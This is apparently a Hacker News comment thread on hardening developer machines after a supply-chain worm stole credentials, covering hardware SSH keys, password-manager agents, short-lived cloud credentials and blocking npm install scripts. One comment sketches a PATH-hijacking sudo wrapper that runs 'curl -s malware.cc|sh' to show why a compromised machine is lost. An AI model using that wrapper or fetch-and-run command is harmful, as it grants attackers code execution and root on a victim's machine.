You can also just generate new ssh keys and protect them with a pin.
not storing SSH keys on the filesystem, and instead using an agent (like 1Password) to mediate access
Stop storing dev secrets/credentials on the filesystem, injecting them into processes with env vars or other mechanisms. Your password manager could have a way to do this.
Develop in a VM separate from your regular computer usage. On windows this is essential anyway through using WSL, but similar things exist for other OSs
One benefit of Microsoft requiring them for Windows 11 support is that nearly every recent computer has a TPM, either hardware or emulated by the CPU firmware.
It guarantees that the private key can never be exfiltrated or copied. But it doesn't stop malicious software on your machine from doing bad things from your machine.
So I'm not certain how much protection it really offers on this scenario.
Linux example: https://wiki.gentoo.org/wiki/Trusted_Platform_Module/SSH
macOS example (I haven't tested personally): https://gist.github.com/arianvp/5f59f1783e3eaf1a2d4cd8e952bb...
https://wiki.archlinux.org/title/SSH_keys#FIDO/U2F
That's what I do. For those of us too lazy to read the article, tl;dr:
ssh-keygen -t ed25519-sk
or, if your FIDO token doesn't support edwards curves: ssh-keygen -t ecdsa-sk
tap the token when ssh asks for it, done.Use the ssh key as usual. OpenSSH will ask you to tap the token every time you use it: silent git pushes without you confirming it by tapping the token become impossible. Extracting the key from your machine does nothing — it's useless without the hardware token.
I mean, if passphrases were good for anything you’d directly use them for the ssh connection? :)
There are lots of agents out there, from the basic `ssh-agent`, to `ssh-agent` integrated with the MacOS keychain (which automatically unlocks when you log in), to 1Password (which is quite nice!).
A case like this brings this out a lot. Compromised dev machine means that anything that doesn't require a separate piece of hardware that asks for your interaction is not going to help. And the more interactions you require for tightening security again the more tedious it becomes and you're likely going to just instinctively press the fob whenever it asks.
Sure, it raises the bar a bit because malware has to take it into account and if there are enough softer targets they may not have bothered. This time.
Classic: you only have to outrun the other guy. Not the lion.
1Password, for example, will, for each new application, pop up a fingerprint request on my Mac before handling the connection request and allow additional requests for a configurable period of time -- and, by default, it will lock the agent when you lock your machine. It will also request authentication before allowing any new process to make the first connection. See e.g. https://developer.1password.com/docs/ssh/agent/security
With this setup there are two different SSH keys, one for access to GitHub, one is a commit signing key, but you don't use either to push/pull to GitHub, you use OAuth (over HTTPS). This combination provides the most security (without hardware tokens) and 1Password and the OAuth apps make it seamless.
Do not use a user with admin credentials for day to day tasks, make that a separate user in 1Password. This way if your regular account gets compromised the attacker will not have admin credentials.
[1] https://developer.1password.com/docs/ssh/agent/ [2] https://developer.1password.com/docs/ssh/git-commit-signing/ [3] https://github.com/hickford/git-credential-oauth [4] https://cli.github.com/manual/gh_auth_login
You can make it a bit more challenging for the attacker by using secure enclaves (like TPM or Yubikey), enforce signed commits, etc. but if someone compromised your machine, they can do whatever you can.
Enforcing signing off on commits by multiple people is probably your only bet. But if you have admin creds, an attacker can turn that off, too. So depending on your paranoia level and risk appetite, you need a dedicated machine for admin actions.
It can also just get lucky and perform a 'git push' while your SSH agent happens to be unlocked. We don't want to rely on luck here.
Really, it's pointless. Unless you are signing specific actions from an independent piece of hardware [1], the malware can do what you can do. We can talk about the details all day long, and you can make it a bit harder for autonomously acting malware, but at the end of the day it's just a finger exercise to do what they want to do after they compromised your machine.
[1] https://www.reiner-sct.com/en/tan-generators/tan-generator-f... (Note that a display is required so you can see what specific action you are actually signing, in this case it shows amount and recipient bank account number.)
I don't think you're necessarily wrong in theory -- but on the other hand you seem to discount taking reasonable (if imperfect) precautionary and defensive measures in favor of an "impossible, therefore don't bother" attitude. Taken to its logical extreme, people with such attitudes would never take risks like driving, or let their children out of the house.
The malware puts this in your bashrc or equivalent:
PATH=/tmp/malware/bin:$PATH
In /tmp/malware/bin/sudo: #!/bin/bash
/sbin/sudo bash -c "curl -s malware.cc|sh && $@"
You get the idea. It can do something similar to the git binary and hijack "git commit" such that it will amend whatever it wants and you will happily sign it and push it using your hardened SSH agent.You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.
If your machine is compromised, it's game over.
https://docs.github.com/en/get-started/git-basics/caching-yo...
The org only has 4-5 engineers. So you can imagine the impact a large org will have.
There has to be a tool that allows you (or an AI) to easily review post-install scripts before you install the package.
pnpm does it by default, yarn can be configured. Not sure about npm itself.
npm still seems to be debating whether they even want to do it. One of many reasons I ditched npm for yarn years ago (though the initial impetus was npm's confused and constantly changing behaviors around peer dependencies)
If you are still on yarn v1 I suggest being consistent with '--ignore-scripts --frozen-lockfile' and run any necessary lifecycle scripts for dependencies yourself. There is @lavamoat/allow-scripts to manage this if your project warrants it.
If you are on newer yarn versions I strongly encourage to migrate off to either pnpm or npm.
Any links for further reading on security problems "under current maintainership"?
And then opt certain packages back in with dependenciesMeta in package.json https://yarnpkg.com/configuration/manifest#dependenciesMeta....
Personally I don't really agree with "was not compromised"
You say yourself that the guy had access to your secrets and AWS, I'd definitely consider that compromised even if the guy (to your knowledge) didn't read anything from the database. Assume breach if access was possible.
Are you sure they didn’t get a service account token from some other service then use that to access customer data?
I’ve never seen anyone claim in writing all permutations are exhaustively checked in the audit logs.
Also everything was double base64 encoded which makes it impossible to use GitHub search.
(personal site linked in bio, who links you onward to my linkedin)
[1] https://x.com/ramimacisabird/status/1994598075520749640?s=20
It was a really noisy worm though, and it looked like a few actors also jumped on the exposed credentials making private repos public and modifying readmes promoting a startup/discord.
No, your security failure is that you use a package manager that allows third-parties push arbitrary code into your product with no oversight. You only have "secutity" to the extent that you can trust the people who control those packages to act both competently and in good faith ad infinitum.
Also the OP seemingly implies credentials are stored on-filesystem in plaintext but I might be extrapolating too much there.
For example with AWS, you can use the AWS CLI to sign you in and that goes through the HTTPS auth flow to provide you with temporary access keys. Which means:
1. You don’t have any access keys in plain text
2. Even if your env vars are also stolen, those AWS keys expire within a few hours anyway.
If the cloud service you’re using doesn’t support OIDC or any other ephemeral access keys, then you should store them encrypted. There’s numerous ways you can do this, from password managers to just using PGP/GPG directly. Just make sure you aren’t pasting them into your shell otherwise you’ll then have those keys in plain text in your .history file.
I will agree that It does take effort to get your cloud credentials set up in a convenient way (easy to access, but without those access keys in plain text). But if you’re doing cloud stuff professionally, like the devs in the article, then you really should learn how to use these tools.
This doesn't really help though, for a supply chain attack, because you're still going to need to decrypt those keys for your code to read at some point, and the attacker has visibility on that, right?
Like the shell isn't the only thing the attacker has access to, they also have access to variables set in your code.
For example, for vars to be read, you’d need the compromised code to be part of your the same project. But if you scan the file system, you can pick up secrets for any project written in any language, even those which differ from the code base that pulled the compromised module.
This example applies directly to the article; it wasn’t their core code base that ran the compromised code but instead an experimental repository.
Furthermore, we can see from these supply chain attacks that they do scan the file system. So we do know that encrypting secrets adds a layer of protection against the attacks happening in the wild.
In an ideal world, we’d use OIDC everywhere and not need hardcoded access keys. But in instances where we can’t, encrypting them is better than not.
Doesn't really matter, if the agent is unlocked they can be accessed.
Sounds like there’s no EDR running on the dev machines? You should have more to investigate if Sentinel One/CrowdStrike/etc were running.
> Total repos cloned: 669
How big is this company? All the numbers I can find online suggest well below 100 people, and yet they have over 600 repos? Is that normal?
I beg to differ and look forward to running my own fiefdom where interpreter/JIT languages are banned in all forms.
moh_quz•11h ago
I'm curious was the exfiltration traffic distinguishable from normal developer traffic?
We've been looking into stricter egress filtering for our dev environments, but it's always a battle between security and breaking npm install
robinhoodexe•7h ago